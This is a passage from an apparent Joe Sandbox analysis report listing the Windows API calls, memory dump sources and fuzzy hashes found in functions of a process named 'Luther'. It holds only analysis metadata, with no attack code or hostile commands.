                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EC39A7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LongWindow$MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 2178440468-0
                                                                                                          • Opcode ID: 9a15e1b326938edb3585888ef4d07af7904a3b385ceb844e84078a9d10ca3b04
                                                                                                          • Instruction ID: 3458ca73e7be835a1d28d7f2ab17b0532a35936936760acaabc68b0527b2f743
                                                                                                          • Opcode Fuzzy Hash: 9a15e1b326938edb3585888ef4d07af7904a3b385ceb844e84078a9d10ca3b04
                                                                                                          • Instruction Fuzzy Hash: 47319A35704255AFDB21CF29DD88F6437E0FB8A314F146168F500AB2B5CB72AD86EB11
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E980D0
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E980F6
                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00E980F9
                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00E98117
                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00E98120
                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00E98145
                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00E98153
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                          • String ID:
                                                                                                          • API String ID: 3761583154-0
                                                                                                          • Opcode ID: 421114c4c612735f3cfcef8b9f6bfba91697e5bbb8d882e57950dc84de3c81dd
                                                                                                          • Instruction ID: 4b437940e076f36796ba19dae39d5a39dc0fe8acf73a7dd5193034f430bd5a6e
                                                                                                          • Opcode Fuzzy Hash: 421114c4c612735f3cfcef8b9f6bfba91697e5bbb8d882e57950dc84de3c81dd
                                                                                                          • Instruction Fuzzy Hash: 1C21B572605219AF9F10DFA9CD88CBE73ACEB093647048435FA15EB2A0DA75DC478760
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E981A9
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E981CF
                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00E981D2
                                                                                                          • SysAllocString.OLEAUT32 ref: 00E981F3
                                                                                                          • SysFreeString.OLEAUT32 ref: 00E981FC
                                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 00E98216
                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00E98224
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                          • String ID:
                                                                                                          • API String ID: 3761583154-0
                                                                                                          • Opcode ID: a687b108fcae6c5191f7df8f123546aadabbf9c91cc84458efb4d5ae62e0e3be
                                                                                                          • Instruction ID: 75f3075344c46823012dc8f86f5e5f3461a92ba369b49cb08e194c5ad4face39
                                                                                                          • Opcode Fuzzy Hash: a687b108fcae6c5191f7df8f123546aadabbf9c91cc84458efb4d5ae62e0e3be
                                                                                                          • Instruction Fuzzy Hash: BC21B271604204AF9F149BA9ED88CAA77ECEB0A3247008135F915EB1B0DA70EC46C764
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00EA0E99
                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EA0ED5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHandlePipe
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                          • Opcode ID: fe9f1cde0f590736db06195fa5c11844fc5bc3126afedf36cacc4395c7b6c134
                                                                                                          • Instruction ID: 071e0ba23ee7dbfb32eaef6ccd36d31796a94e5b271890498027813bc8aa279b
                                                                                                          • Opcode Fuzzy Hash: fe9f1cde0f590736db06195fa5c11844fc5bc3126afedf36cacc4395c7b6c134
                                                                                                          • Instruction Fuzzy Hash: CB216075604309AFDB308F25DC04A9A77E8BF5A724F204A69FCA5FB2D0D772A841DB50
                                                                                                          APIs
                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00EA0F6D
                                                                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EA0FA8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHandlePipe
                                                                                                          • String ID: nul
                                                                                                          • API String ID: 1424370930-2873401336
                                                                                                          • Opcode ID: a8b4cf942397b8e70eb8e2d92b5c53d6896d5e1fdfaf39ec1cd7376c8fe73d88
                                                                                                          • Instruction ID: 3433d2781c9fddd2218ad125dfc873a344402fa478d5d0c98c0d1500e63f4c38
                                                                                                          • Opcode Fuzzy Hash: a8b4cf942397b8e70eb8e2d92b5c53d6896d5e1fdfaf39ec1cd7376c8fe73d88
                                                                                                          • Instruction Fuzzy Hash: 4921F475604305DFDB308F298C44A9AB7E8BF5A324F200A28F8A1FB2D0D771A881CB50
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E37873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E378B1
                                                                                                            • Part of subcall function 00E37873: GetStockObject.GDI32(00000011), ref: 00E378C5
                                                                                                            • Part of subcall function 00E37873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E378CF
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EC4BB0
                                                                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EC4BBD
                                                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EC4BC8
                                                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EC4BD7
                                                                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EC4BE3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                                                                          • String ID: Msctls_Progress32
                                                                                                          • API String ID: 1025951953-3636473452
                                                                                                          • Opcode ID: cb3af1b395f53a9324b6be6a1c011e5ba78def1fdc151321850e100fa6995196
                                                                                                          • Instruction ID: 0f674ca04d0e3cfc4aa7ceac4823fcb1fd41c12d134fe207c7eb2818156f06f2
                                                                                                          • Opcode Fuzzy Hash: cb3af1b395f53a9324b6be6a1c011e5ba78def1fdc151321850e100fa6995196
                                                                                                          • Instruction Fuzzy Hash: 2B11B6B614021DBEEF118F65CC85FE77FADEF08758F015111BA08A2090CA72DC21DBA0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E6DB23: _free.LIBCMT ref: 00E6DB4C
                                                                                                          • _free.LIBCMT ref: 00E6DBAD
                                                                                                            • Part of subcall function 00E62D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4), ref: 00E62D4E
                                                                                                            • Part of subcall function 00E62D38: GetLastError.KERNEL32(00F01DC4,?,00E6DB51,00F01DC4,00000000,00F01DC4,00000000,?,00E6DB78,00F01DC4,00000007,00F01DC4,?,00E6DF75,00F01DC4,00F01DC4), ref: 00E62D60
                                                                                                          • _free.LIBCMT ref: 00E6DBB8
                                                                                                          • _free.LIBCMT ref: 00E6DBC3
                                                                                                          • _free.LIBCMT ref: 00E6DC17
                                                                                                          • _free.LIBCMT ref: 00E6DC22
                                                                                                          • _free.LIBCMT ref: 00E6DC2D
                                                                                                          • _free.LIBCMT ref: 00E6DC38
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 776569668-0
                                                                                                          • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                          • Instruction ID: f134a2716bc68874eb24c35a2f555a8c6638dc6ce4b668a18889be4cfea2f68f
                                                                                                          • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                          • Instruction Fuzzy Hash: A1118E72AC5B04BAD620BBB0EC07FDB77DCAF15780F805C1DB299FA252DA74B5048650
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memcmp
                                                                                                          • String ID: j`
                                                                                                          • API String ID: 2931989736-1521845545
                                                                                                          • Opcode ID: 6ecb404aed9a5af757d82a9431f485bb184e1a19c0313c74a4fe724ab3472ffc
                                                                                                          • Instruction ID: 2fe329fb47db411430eb49aaac4d822c5b4c402bb29ccd922aa3aff7560b8c1b
                                                                                                          • Opcode Fuzzy Hash: 6ecb404aed9a5af757d82a9431f485bb184e1a19c0313c74a4fe724ab3472ffc
                                                                                                          • Instruction Fuzzy Hash: 0E01F1E26043057BDA2056248CC2FAB739DDE0539DF042427FD0ABA341E721ED15C6A1
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E9E328
                                                                                                          • LoadStringW.USER32(00000000), ref: 00E9E32F
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E9E345
                                                                                                          • LoadStringW.USER32(00000000), ref: 00E9E34C
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E9E390
                                                                                                          Strings
                                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 00E9E36D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString$Message
                                                                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                                                                          • API String ID: 4072794657-3128320259
                                                                                                          • Opcode ID: 6dd6878f2996caaef05661b6c508dab7d0b483f761d7b1d99b3d02271cb9ac55
                                                                                                          • Instruction ID: 88950131d490672d953dda3c54fa2cf4f3c44cbb73d85692e525efeef2ce963d
                                                                                                          • Opcode Fuzzy Hash: 6dd6878f2996caaef05661b6c508dab7d0b483f761d7b1d99b3d02271cb9ac55
                                                                                                          • Instruction Fuzzy Hash: 940162F2904208BFE711D7A4CD89EE6776CDB08344F0045B1B745F6041E6769E898B75
                                                                                                          APIs
                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 00EA1322
                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?), ref: 00EA1334
                                                                                                          • TerminateThread.KERNEL32(00000000,000001F6), ref: 00EA1342
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00EA1350
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EA135F
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EA136F
                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 00EA1376
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 3495660284-0
                                                                                                          • Opcode ID: 3138cca579b45824bbb1df862ccefbcd4e6653cf51303b403a47608f85747bac
                                                                                                          • Instruction ID: beeb94e275da4d2a71c482a1091a3bb18afb7119821e4b2460c2b8929d6608ce
                                                                                                          • Opcode Fuzzy Hash: 3138cca579b45824bbb1df862ccefbcd4e6653cf51303b403a47608f85747bac
                                                                                                          • Instruction Fuzzy Hash: 7FF0C932046612AFD7455F55EE49FDABB39FF05306F402131F102A58B08776A46ACF90
                                                                                                          APIs
                                                                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00EB281D
                                                                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EB283E
                                                                                                          • WSAGetLastError.WSOCK32 ref: 00EB284F
                                                                                                          • htons.WSOCK32(?,?,?,?,?), ref: 00EB2938
                                                                                                          • inet_ntoa.WSOCK32(?), ref: 00EB28E9
                                                                                                            • Part of subcall function 00E9433E: _strlen.LIBCMT ref: 00E94348
                                                                                                            • Part of subcall function 00EB3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00EAF669), ref: 00EB3C9D
                                                                                                          • _strlen.LIBCMT ref: 00EB2992
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                          • String ID:
                                                                                                          • API String ID: 3203458085-0
                                                                                                          • Opcode ID: d4ab3e7e6bda862d21c449d2b20e6074434270a4ee836a0f3c22c6c90a561563
                                                                                                          • Instruction ID: 079d4f86e7bca70ea1c03d4493f537525a28d8c59d5f1b5769db2a58971f3d42
                                                                                                          • Opcode Fuzzy Hash: d4ab3e7e6bda862d21c449d2b20e6074434270a4ee836a0f3c22c6c90a561563
                                                                                                          • Instruction Fuzzy Hash: F0B10431604300AFD324DF24C885F6BBBE5AF84318F54A95CF5566B2A2DB31ED46CB91
                                                                                                          APIs
                                                                                                          • __allrem.LIBCMT ref: 00E6042A
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E60446
                                                                                                          • __allrem.LIBCMT ref: 00E6045D
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E6047B
                                                                                                          • __allrem.LIBCMT ref: 00E60492
                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E604B0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                          • String ID:
                                                                                                          • API String ID: 1992179935-0
                                                                                                          • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                          • Instruction ID: e6f2f5a93584d344321c85d3f745032591f7179a658ae488e902f68902dba587
                                                                                                          • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                          • Instruction Fuzzy Hash: 7281F8716C07269BD720AE68EC85B6B73E9EF543A4F24652EF521F72C1EB70D9008790
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E58649,00E58649,?,?,?,00E667C2,00000001,00000001,00000000), ref: 00E665CB
                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E667C2,00000001,00000001,00000000,?,?,?), ref: 00E66651
                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E6674B
                                                                                                          • __freea.LIBCMT ref: 00E66758
                                                                                                            • Part of subcall function 00E63B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E56A79,?,0000015D,?,?,?,?,00E585B0,000000FF,00000000,?,?), ref: 00E63BC5
                                                                                                          • __freea.LIBCMT ref: 00E66761
                                                                                                          • __freea.LIBCMT ref: 00E66786
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1414292761-0
                                                                                                          • Opcode ID: c2c87f60e73cc01f9ce410ded80d3ffd064bfb198d9ef2b56daeef26d4c290aa
                                                                                                          • Instruction ID: a6ccb5ef0a4257aaa53211e71db8ba2d8cc7710cd4ab2d43341c169649b2157c
                                                                                                          • Opcode Fuzzy Hash: c2c87f60e73cc01f9ce410ded80d3ffd064bfb198d9ef2b56daeef26d4c290aa
                                                                                                          • Instruction Fuzzy Hash: 76511972660206AFDB258F64EC45EBF77AAEB40798F14566AFC04F6140EB35EC50C690
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E3B329: _wcslen.LIBCMT ref: 00E3B333
                                                                                                            • Part of subcall function 00EBD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBC10E,?,?), ref: 00EBD415
                                                                                                            • Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD451
                                                                                                            • Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4C8
                                                                                                            • Part of subcall function 00EBD3F8: _wcslen.LIBCMT ref: 00EBD4FE
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBC72A
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EBC785
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EBC7CA
                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EBC7F9
                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EBC853
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00EBC85F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 1120388591-0
                                                                                                          • Opcode ID: 4a15b92ef1eb8f6431816d51f65e8e9e250a3abd2e3f7013fabeb27c6b17aeb8
                                                                                                          • Instruction ID: a1fe7485a652498e939eda17464197c6c7756a5d14aed4560c0a8a57a95597af
